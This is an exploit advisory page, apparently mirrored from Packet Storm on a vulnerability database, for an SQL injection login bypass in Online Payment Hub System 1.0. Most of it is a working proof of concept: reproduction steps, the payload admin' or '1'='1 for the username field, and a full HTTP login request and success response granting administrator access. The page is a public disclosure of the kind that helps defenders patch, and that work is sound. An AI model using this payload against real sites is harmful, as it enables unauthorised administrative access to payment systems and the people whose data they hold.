Lucene search
K

Online Payment Hub System 1.0 SQL Injection

🗓️ 31 May 2024 00:00:00Reported by Hamit AvşarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 249 Views

Online Payment Hub System 1.0 SQL Injection bypasses login by injecting SQL to username paramete

Code
`# Exploit Title: Online Payment Hub System - SQLi Authentication Bypass  
# Date: 29.05.2024  
# Exploit Author: Hamit Avşar  
# Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code  
# Version: 1.0  
# Tested on: Windows 11, Kali Linux  
# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.  
  
Steps To Reproduce:  
1 - Go to the login page http://localhost/oph/admin/login.php  
2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.  
3 - Click on "Login" button and you are logged in as administrator.  
  
PoC  
  
Request  
  
POST /oph/classes/Login.php?f=login HTTP/1.1  
Host: localhost  
Content-Length: 42  
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"  
Accept: */*  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/oph/admin/login.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i  
Connection: close  
  
username=admin'+or+'1'%3D'1&password=hamit  
  
--------------------------------------------------------------------------------------------------------------------------------  
  
response  
  
HTTP/1.1 200 OK  
Date: Wed, 29 May 2024 17:15:28 GMT  
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30  
X-Powered-By: PHP/8.0.30  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 20  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
{"status":"success"}  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation